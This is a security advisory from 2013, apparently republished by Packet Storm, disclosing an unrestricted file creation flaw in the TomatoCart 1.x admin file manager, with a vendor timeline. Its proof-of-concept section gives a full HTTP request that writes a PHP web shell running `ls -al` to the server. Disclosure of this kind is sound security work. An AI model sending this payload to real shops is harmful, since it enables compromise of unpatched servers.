TomatoCart 1.x Unrestricted File Creation

2013-01-04T00:00:00
ID PACKETSTORM:119255
Type packetstorm
Reporter Aung Khant
Modified 2013-01-04T00:00:00

Description

                                        
                                            `1. OVERVIEW  
  
TomatoCart 1.x versions are vulnerable to Unrestricted File Creation.  
  
  
2. BACKGROUND  
  
TomatoCart is an innovative Open Source shopping cart solution  
developed by Wuxi Elootec Technology Co., Ltd. It is forked from  
osCommerce 3 as a separate project and is released under the GNU  
General Public License V2. Equipped with the web2.0 Technology Ajax  
and Rich Internet applications (RIAs), TomatoCart Team is devoted to  
building a landmark eCommerce solution.  
  
  
3. VULNERABILITY DESCRIPTION  
  
TomatoCart 1.x versions contain a flaw related to the /admin/json.php  
script's failure to properly restrict created files. This may allow an  
attacker to create arbitrary shell script to launch further attacks on  
the application server.  
  
  
4. VERSIONS AFFECTED  
  
Tested on 1.1.8, 1.1.5  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
/////////////////////////////////////////////////////////////////////  
POST /admin/json.php HTTP/1.1  
Host: localhost  
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 195  
  
module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo  
'<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>  
///////////////////////////////////////////////////////////////  
  
  
6. SOLUTION  
  
The vendor did not show commitment in hardening the application.  
It is recommended to use alternative shopping cart application with  
good track record of security fixes.  
  
  
7. VENDOR  
  
Wuxi Elootec Technology Co., Ltd.  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2012-04-22: Contacted the vendor through email  
2012-04-29: Vendor replied and the vulnerability detail was sent  
2013-01-04: Vulnerability not fixed  
2013-01-04: Vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation  
TomatoCart Home Page: http://www.tomatocart.com/  
  
#yehg [2013-01-04]  
  
---------------------------------  
Best regards,  
YGN Ethical Hacker Group  
Yangon, Myanmar  
http://yehg.net  
Our Lab | http://yehg.net/lab  
Our Directory | http://yehg.net/hwd  
`